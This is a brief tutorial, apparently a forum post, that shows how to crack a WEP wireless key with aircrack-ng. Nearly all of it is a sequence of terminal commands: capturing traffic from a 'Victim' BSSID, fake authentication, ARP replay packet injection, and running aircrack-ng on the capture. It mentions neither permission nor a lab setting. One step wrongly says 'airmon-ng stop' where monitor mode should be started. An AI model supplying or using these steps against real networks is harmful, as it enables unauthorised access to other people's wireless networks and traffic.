- Hello everyone
Today I will show you how to hack wireless wep key with Aircrack-ng
Let's start :)
Open terminal:
airmon-ng stop [your interface] [My is wlan0]
airodump-ng [your interface] [My is wlan0]
airodump-ng --channel [Victim channel] --write wep --bssid [Victim BSSID] [your interface] [My is wlan0] **Attention not close this terminal **
Open new terminal:
aireplay-ng -1 0 -a [Victim BSSID] [your interface] [My is wlan0]
**Attention wait for the recognize router :-) **
Open new terminal:
aireplay-ng -3 -b [Victim BSSID] [your interface] [My is wlan0]
**Attention not close this terminal **
Open new terminal:
aircrack-ng wep-01.cap
**Attention Wait to collect 5000 packets and start Aircrack-ng attack**